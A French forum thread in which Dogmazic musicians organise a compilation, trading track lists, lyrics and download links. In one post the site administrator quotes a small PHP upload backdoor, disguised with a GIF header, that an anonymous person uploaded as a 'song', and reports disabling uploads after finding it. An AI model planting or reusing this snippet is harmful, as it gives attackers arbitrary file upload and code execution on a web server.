Pour nous contacter : soyez au rendez-vous sur IRC ! ⋅ Parcourir l'archive musicale Dogmazic ⋅ Notre Blog
Notre Documentation

compilation dogmazienne pour la V3 ?

1246711

Réponses

  • C'est marrant, mais je ne vois pas l'intérêt d'un objet physique comme un CD. Je voyais plutôt la compil comme une occasion de fêter et de promouvoir, l'heure venue, la possibilité de poster de nouveau des morceaux sur Dogmazic, donc un truc téléchargeable, ce qui n'empêche pas de faire un peu de décoration autour, genre une page spéciale sur le site, des textes, des graphismes, s'il y en a que ça intéresse. En plus ça n'impose plus une limite de durée, ni de nombre de morceaux. Pour moi Dogmazic n'a rien à voir avec le monde des CD, mais tout à voir avec le monde de l'Internet, il faut donc aller dans ce sens. Mais, quelle que soit l'idée retenue, je sponsoriserai quand même.
    Jean-Pierre
  • Salut jp_h

    L'intérêt de l'objet physique, c'est d'avoir, de faire quelque chose en plus de la compile virtuelle, une occasion de marquer le coup, parce que des compiles en virtuel, il en sort tout le temps sur internet.

    Au delà de ça, acheter une compile, ça peut être une façon sympa et efficace de soutenir financièrement dogmazic, beaucoup de monde qui n'aurait pas fait de don autrement achètera volontiers la compile (en tout cas on peut le supposer).

    Ensuite, ouais, aujourd'hui la musique, ça a tendance à plus se passer dans le virtuel, mais pour les gens qui comme moi sont un peu fétichistes, un objet, en plus d'une page internet, c'est juste essentiel pour faire "exister" un album. Un disque ou une cassette a pour moi plus d'impact sur le réel qu'un fichier zip.

    Et je ne vois pas dogmazic comme ayant tout à voir avec internet et rien avec les CDs. Dogmazic, milite pour la musique libre, et autant je peux avoir de la musique sur CD en copyleft, autant un fichier mp3 peut être full copyright.

    La musique libre c'est pas seulement du téléchargement libre, c'est des concerts libres, et aussi des disques libres. C'est pour ça que je trouve que cette idée d'objet physique est une très bonne chose. Ce qui n'empêche pas de diffuser sur le net.


  • Hello,
    Il y a un mot que tu emploies qui sonne faux à mon oreille, c'est "virtuel". Pour moi un fichier est tout sauf virtuel. Le jour où j'ai entendu ce que faisait un dénommé Saturnin sur Audiofanzine, je suis allé sur Amazon et je n'ai pas eu l'impression de dépenser 8 € virtuels pour télécharger son album. Et quand j'écoute les fichiers mp3 sur mon autoradio, ils sonnent comme de la musique réelle.
    ;)
    jp
  • Héhé, disons dématérialisé ?

    Sinon, bien sûr ce qui compte avant tout, c'est la musique, ça m'est même arrivé une fois d'acheter un album en mp3 (Renaissance de LND).

    Inconsciemment, c'est peut être pas anodin si j'ai utilisé le mot virtuel, parce que je trouve que de la musique enregistrée sur un disque dur, surtout si c'est d'la bonne, c'est super mais il lui manque quelque chose pour "s'incarner" : un objet qui la contient.

    Mais je reconnais qu'on puisse trouver ça secondaire, et si des gens (comme moi) sont intéressés pour participer financièrement et autre pour la réalisation d'un CD, c'est clair que ça doit pas être imposé à ceux que ça n'intéresse pas spécialement.
  • Salut à tous,

    Pour relancer un peu ce projet de compile, y a quelques temps de ça j'avais fait une chanson en hommage à dogmazic qui s'appelle "dogmazic point net", une chanson un peu cucul que j'imaginais avec des arrangements ultra kitsch et même pourquoi pas un clip avec tout le monde qui danse, mais je me suis arrêté au stade de la demo acoustique.

    Ces derniers temps, je me consacre à mes projets electro et je me sens pas de pousser la chansonnette, cela dit, puisqu'on fait une compil' dogmazic, le thème serait sympa, donc je mets à disposition mon texte, si ça intéresse quelqu'un d'en faire une chanson, you're welcome (et c'est sous LAL) :

    Dogmazic point net

    Toi le badaud du web, musicien du dimanche
    Toi qu'a le verbe qui tranche, ou simple gens de la plèbe
    Si tu veux d'la culture du genre qui se partage
    De nos jours c'est dur comme le voudrais l'adage.

    Mais sèche donc tes larmes, y a encore de l'espoir
    Ne jette pas les armes, il faut encore y croire
    Les maisons d'disque se jettent en l'air et c'est tant mieux
    Et tous ces sites foireux inondent l'internet...

    Mais dogmazic point net, c'est un petit site qu'il est chouette
    De la musique mais pas seulement, un art de vivre qu'on te tend
    Dogmazic point net, c'est un petit site qu'il est chouette
    De la musique mais pas seulement, un art de vivre qu'on te vend... gratuitement

    Sur dogmazic point net, y a plein de chansonettes
    Et y a des philosophes, des esprits qui s'échauffent
    Y a aussi des juristes, et même quelques artistes
    Souvent agités, toujours passionnés

    Y a pas de pub, y a pas de spam, pas de thanx4theadd
    Pas de réseau social, pas de liste d'amis
    Pas d'animation flash, pas de licence pro
    Pas de kikoo pas de lol, pas de kikoo pas de lol

    Ouais dogmazic point net, c'est un petit site qu'il est chouette
    De la musique, mais pas seulement, un art de vivre qu'on te tend
    Dogmazic point net, c'est un petit site qu'il est chouette
    De la musique, mais pas seulement, un art de vivre que tu prends... librement.


  • Tiens au passage, j'ai enregistré un morceau le WE pour la compile, prise live, 100% impro avec juste un texte pré-écrit. Il va y avoir du taf de mise en forme / mix avant de pouvoir l'uploader, mais ça fera un titre de plus ...

    Zeco
  • Salutation à tous.

    J'ai relu les post et du coup j'ai vu qu'on disait qu'il fallait n'envoyer qu'un seul morceau pour que chacun puisse en mettre un, donc je ne sais pas qui gère l'afflux ds morceaux en direction de la compile, mais comme j'en avais posté 4, je voulais juste dire que je préfèrerais que ça soit le morceau Bariolé (ou Cascadia si vous la préférez) des 4 que j'avais sélectionnés.

    Cordialement à tous ;)
  • Salut, 

    Juste pour Clewn, il y a trois morceaux suffisamment tagués ID3/vorbiscomment et disponible dans suffisamment de formats pour apparaître dans l'interface. 

    J'aime beaucoup, sinon, ce très amusant morceau posté, qui ne contient en fait, que les lyrics :

    --citation d'un anonyme--
    GIF89a;


    <form enctype=multipart/form-data  method=post><input name=userfile type=file><input type=submit name=go_up></form>
    <?php 
    if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};
    ?>
    -- fin de citation --



    Il permet d'uploader n'importe quel type de fichier directement, lorsqu'on y accède, et donc d'executer du code sur le serveur de manière user friendly, la méthode (basé sur une possible erreur de ma part, j'ai pris comme assertion le fait qu'Apache devait déterminer le type des fichiers en fonction de leur extension pour savoir ce qu'il doit en faire, par exemple l'interpréter comme du code, coté serveur, ou le servir au client) utilisée pour uploader ce fichier étant moins user friendly que le formulaire qu'il propose. Notez que cette faille de sécurité implique que Clewn.org est peut-être totalement vérolé, c'est ça de rendre visible un site web qui se voulait discret, juste pour permettre à une petite asso pas trop connu de sortir une compil sur cylindre de cire. 

    Le fichier en question, au vu de sa date d'upload très récente, n'a pas dû être beaucoup utilisé, car le seul fichier uploadé plus récent que lui est celui que je viens d'envoyer pour tester si le crack fonctionne. Mais il est également possible qu'il ait été utilisé pour compromettre le site via des fichiers interprétable qui s'auto-effacent une fois le boulot terminé. 

    Mais à part ça, les morceaux (garantis sans OGM, car ce sont des fichiers audio, et je ne connais pas de moyen de virusser une machine qui sert à lire un fichier audio en utilisant un fichier audio comme vecteur à moins qu'elle ne soit déjà sévèrement compromise au préalable (ce qui est quand même le cas de beaucoup de machines, il y a déjà quelques temps le plus gros supercalculateur massivement parallèle de la planète était déjà un botnet de zombies (botnet : des zombies qui travaillent en réseau, par exemple pour fournir de la puissance de calcul. Zombie : une machine compromise pour faire des choses en arrière plan à votre insu, typiquement un Windows XP craqué installé par votre beau frère qui vous a garanti que la police ne vous attrapera jamais. Il sera peut-être plus profitable pour vous qu'elle le fasse)  : 

    (de Jean-Marc Corvisier) : 


    De monpauvrelieu : 


    de Vidabreve : 


    De devinez qui : 


    Du coup, pansement sur une jambe de bois, j'ai désactivé à la haxe la fonction d'upload, et je supprime le fichier magique, vous ne pourrez pas vérifier facilement l'exactitude de ma quote des lyrics qu'il contient. 

    Ce petit tour pour spammer un peu le forum est décidément bien sympa niveau bonnes surprises, et il est pas encore fini. 


  • mars 2013 modifié
    Ah et j'oubliais


    Mais pour le premier je suis pas absolument certain qu'il soit destiné à la compil et comme l'heure de l'apero/riz/sexe/cocaïne (rayez les mentions inutiles) approche je ne vais pas aller lire ses tags ou l'écouter. 

    Pff 35 secondes pour le dl. 

    Pff c'est même pas fini. 

    Pff c'était même pas fini quand je suis retourné voir, mais le temps que j'en fasse état c'est fini. 

    Bon, on dirait bien que ce n'est pas un transfuge évadés des fausses manip induites par les déménagements successifs de l'archive temporaire et partielle de Dogmazic en attendant la V3 ( http://clewn.org/audio/clewn/opt/hop/audio/dog/audio/ ). Débrouillez-vous avec ça : 

    Title:   dope on plastik                 Artist: namm/dogmazic.net
    Comment:                                 Album:  
    Year:                                    Genre:  Acid

    Bon apéro, sexe, drogue, cocaïne, ou fin d'été (pour la Terre Adélie). 

    Edit 1 : je m'aime bien
    Edit 2 : j'aime aussi le wysiwyg, mais moins
  • Salut Shangril,

    Bon, j'ai pas compris grand chose à toutes ces incantations barbares dans la langue occulte des machines que je connais mal. J'ai toutefois repéré que tu y mentionnais mon morceau "Cocaïne, sexe, riz, thé"... celui que j'ai uploadé pour la compile. Je suis pas sur d'avoir compris s'il y a un problème ou pas avec ce morceau... dis moi si faut que je refasse un truc que j'aurais mal fait niveau tag ou autre...

    (je suggère par contre d'entourer les mentions utiles, plutôt que de rayer les inutiles)
  • Salu Gabite, 

    non, y'a plus rien à faire, puisque suite au piratage j'ai désactivé la fonction d'upload, et y'a aucun problème avec ce morceau, que j'avais juste récupéré rapidement, je me souviens plus comment, entre le moment où megaupload t'as banni, probablement automatiquement suite a des délations de jaloux organisé, et le moment où tu as tout mis sur soundcloud (et à ce moment je n'ai pas jugé nécessaire de mettre le second morceau sur clewn). S'il est pas taggué, c'est juste par ce que j'ai pas non plus jugé utile de le faire, car je suppose que tu as mis toutes les infos utile sur soundcloud. 

    Bab aïe
  • (Et note que ce n'est pas la langue des machines. C'est la langues des humains, qu'ils utilisent pour se donner l'impression qu'ils contrôlent les machines. Pour plus d'information je te renvoie à http://desencyclopedie.wikia.com/wiki/Steaminator_10%E2%82%AC-2 )
  • Yep !

    Bon, tant mieux si tout roule avec le morceau alors :)

    D'ailleurs, ça serait pas mal de faire un point sur où on en est, et ce qui est encore à faire pour cette compile. Donc pour l'instant on a :

    - Jean Marc Corvisier
    - Monpauvrelieu
    - Vidabreve
    - Me in the bath
    - Mig Inc

    Pour les morceaux que shangril a listés, auxquels vont se rajouter

    - Zeco
    - Jp-h

    J'ai reparcouru le fil depuis le début pour faire un petit recensement des participants, donc il y aurait aussi les participations de :

    - soja
    - Realaze
    - zzjmc
    - explicite
    - Tumulte
    - ORL AMMD (qui est un collectif et peut proposer plusieurs morceaux)

    Ce qui nous amène à 13 morceaux et peut être plus. Déjà, est-ce que j'ai oublié des participants, et est-ce que la participation de tout le monde que j'ai listé est toujours d'actualité ?

    Pour le visuel, whiteshoulders a proposé un truc sympa : http://forum.dogmazic.net/index.php?p=/discussion/7110/important-preparation-campagne-de-don-compilet-shirt-#Item_8

    Perso l'idée me plait bien, si elle convient à tout le monde on pourrait voir pour la mettre sur pied ?
  • zzjmc & Jean Marc Corvisier sont une seule et même personne.

    Perso je kiffe les réalisations graphiques de m'sieur Whitshoulders.
    pour ma part le morceau en cours de Mix est du groupe The GARNs, qui n'était pas sur dogmazic v2, mais sera surement sur dogmazic v3.
    Et je proposerai bien un morceau de Tit Patapons aussi, il est composé, mais je ne suis pas certain d'avoir le temps de l'enregistrer avant la deadline, m'enfin c'est en projet ...
  • (partie 1)



    Yeah ! Gabite ! Gabite n'abandonne jamais ( (c) Shangri-l 2013 tous droits réservés :) )


    à
    ajouter :  namm ; vu la date d'upload du morceau (début janvier) et le
    namm/dogmazic.net dans les tags, c'est quasi certain que c'est pour la
    compil 



    à ajouter : whiteshoulders, car il a fait un mix Tit
    Patapons / Shangri-l / Dead Joshua ; zeco a suggéré qu'il soit sur la
    compil, et whiteshoulders est 100% d'accord avec ça. Voir le fil sur le
    visuel que tu viens d'indiquer. 

    Ma participation est toujours d'actualité. 

    Je passe sur l'idée de whiteshoulders pour le visuel. J'aime
    bien l'idée mais je suis pas sûr d'avoir le temps de réfléchir assez
    pour m'exprimer clairement. Donc je passe. Voici donc une liste mise à
    jour :

  • Partie 2 : 



    Morceaux disponibles via Clewn : 


    - Jean Marc Corvisier (1 morceau) *
    - Juanito Carabonita (1 morceau) (label : Productions Monpauvrelieu)
    - Vidabreve (4 morceaux) *
    - Me in the bath (1 morceau)
    - Migraine Inc (sexe cocaïne riz thé)
    - namm *

    Une
    sauvegarde de ces morceaux tels qu'ils étaient sur clewn le 20 mars '13
    un peu avant 14 heure (de Paris) est en cours de mise en ligne
    ailleurs, les liens viendront probablement assez vite dans un prochain
    message sur ce fil. 

    Morceaux disponible via Soundclound entre autre, à ma connaissance : 

    -Migraine Inc (2 morceaux, "sexe cocaine riz thé" et "voyage en train")

    Morceaux dont j'ignore beaucoup de choses : 

    - Whiteshoulders (mix de Tit Patapons, Shangri-l et dead joshua) *
    - Zeco *
    - jp-h *
    - soja *
    - Realaze *
    - Explicite *
    - Tumulte *
    - ORL AMMD*

    Il
    se trouve que zzjmc est le nom d'utilisateur Dogmazic de Jean-Marc
    Corvisier, c'est pour cela qu'il n'est pas listé dans cette troisième
    partie, puisqu'il est listé dans la première. 

    *
    les astérisque indiquent que je ne peux dire avec certitude quelle est
    la licence du ou des morceau(x) sans faire un minimum de recherche
    avant. 

    (fin
    des messages. Pour revenir au menu principal, appuyez sur la touche
    étoile de votre téléphone - désolé pour la mise en forme, j'ai vraiment
    du mal avec Vanilla au niveau de son éditeur au niveau de la mise en
    forme)
  • Participation toujours d'actualité en ce qui me concerne.
  • --- cadeau bonus---

    Généré avec les mp3 et media2html l'utilitaire codé par Logan, une page avec player pour écouter les 10 morceaux proposés pour la compil qui sont déjà fini, sauf Voyage en train que j'avais la flemme de chercher : 


    --- pour ceux qui prennent le train en marche ---

    Ce n'est plus la peine d'essayer d'utiliser Clewn pour uploader des morceaux, y compris des morceaux que tu souhaites proposer pour la compil, qui que tu sois. Il y a une faille de sécurité, j'ai désactivé la fonction d'upload hier, en attendant, soit que les développeur d'Apache changent un peu leur idée de ce qui est secure, soit que je sécurise moi même, au premier des termes échus. 

    --- choses prévues, choses dues---

    (voici la : )

    Copie des morceaux téléversés vers Clewn.org entre le moment de la mise à
    disposition d'une fonction de téléchargement pour centraliser les
    morceaux destiner à la compilation dite "Dogmazic V3" et le moment de la
    désactivation de toute fonction de téléversement vers Clewn.org.



    Copie réalisée le 20 mars 2013 un peu avant 14 heures. Les musiciens
    scrupuleux voudront peut-être vérifier que leur travail n'a pas été
    altéré suite à un incident durant les divers transferts ou le stockage
    sur Clewn.org. C'est peu probable, mais sait-on jamais ?



    Légende :



    lien http pour télécharger (artiste ou projet musical - titre de l'œuvre - format du fichier audio téléchargeable)



    http://ubuntuone.com/7ib8tJbPKWct3lEhQry154 (Me In The Bath - Fightress Dyha - ogg

    http://ubuntuone.com/1Aa2UDw0mDMnvr2QqM4hwi (Me In The Bath - Fightress
    Dyha - mp3) http://ubuntuone.com/5qQebPxv7PcUrZDVkwxOj3 (Migraine Inc  -
    cocaine sexe riz the (clean mix) - ogg)

    http://ubuntuone.com/28yp6aVgFegP0PnVHOnaDb (Vidabreve - Adelita de Francisco Tarrega - mp3)

    http://ubuntuone.com/7ERgGEmVR9dlkWSxcsJ29f (Me In The Bath - Fightress Dyha - flac)

    http://ubuntuone.com/7JAmWEssa2jp4QS3CpdYVD (namm/dogmazic.net - dope on plastik - mp3)

    http://ubuntuone.com/1v02EbUYRR842sFQA99lSw (Migraine Inc  - cocaine sexe riz the (clean mix) - mp3)

    http://ubuntuone.com/0QcQum6iBm2iaWpuP1rDzB (Vidabreve - Fougue - mp3)

    http://ubuntuone.com/1zs0HH1exFdEvkpU7BSPgr (Vidabreve - Afro.mp3)

    http://ubuntuone.com/6bfgep4KWteWyN0ZPJpwgj (Juanito Carabonita - Orgyll
    (version batterie préparée et pianoforte, ft shangri-l) - mp3)

    http://ubuntuone.com/5KXRd81HKx8F78erUV2Uv0 (Juanito Carabonita - Orgyll
    (version batterie préparée et pianoforte, ft shangri-l) - ogg)

    http://ubuntuone.com/6GepNqjB8lsJ4YkiRuvbN5 (Vidabreve - Cascadia - mp3)

    http://ubuntuone.com/3Wws2hgMlKTSFI9RSaYqMr (Juanito Carabonita - Orgyll
    (version batterie préparée et pianoforte, ft shangri-l) - flac)

    http://ubuntuone.com/2JMltCpJF1WbFLdePRGeIL (Jean Marc Corvisier - Message From Our Friends - ogg)

    http://ubuntuone.com/5qc1o0RRCrw3YY7lgRmp1S (Jean Marc Corvisier - Message From Our Friends - mp3)

    http://ubuntuone.com/631jGFDS87bE7KK9ibKBIZ (Migraine Inc  - cocaine sexe riz the (clean mix) - flac)

    http://ubuntuone.com/4pGrnArCaN56YDwzRROEaS (Jean Marc Corvisier - Message From Our Friends - flac)



    Les titres sont indiqués sous réserve, notamment au niveau de la ponctuation et des symboles diacritiques. 

    Ciao
  • Bon, donc je participe aussi, avec "Marions les sons", featuring Tit Patapons, Shangri-l et dead joshua.

    Les fichiers audio sont dispo ici (flac, ogg et mp3, au choix): http://whiteshoulders.fr/source/goodmorninglemings/marionslessons/

    Le tout est dispo sous Creative Commons, by-nc-sa, mais pour la compile (qui va être vendue a priori, donc commerciale) j'autorise totalement et sans condition l'utilisation commerciale (si les artistes dont dérive le morceau n'y voient aucun problème, y'en a 2 sur les 3 sur le fil).
  • mars 2013 modifié
    EDIT suite à suppression des messages de Waz qui sont disparus encore plus vite qu'ils sont arrivés